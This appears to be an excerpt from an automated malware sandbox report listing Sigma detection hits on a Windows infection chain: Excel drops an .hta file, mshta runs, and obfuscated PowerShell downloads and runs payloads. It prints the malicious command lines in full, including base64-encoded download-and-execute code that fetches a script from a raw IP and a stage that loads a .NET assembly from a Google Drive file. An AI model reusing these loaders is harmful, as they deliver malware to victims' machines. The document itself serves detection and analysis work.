                Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3556, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatthingswithgoodnewsgivenbygodthingsgreat[1].hta
                Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7d
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7d
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7d
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , ProcessId: 2836, ProcessName: wscript.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5k
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))", CommandLine: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgI
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3556, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3848, ProcessName: mshta.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3944, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe, ProcessId: 4056, ProcessName: powershell.exe
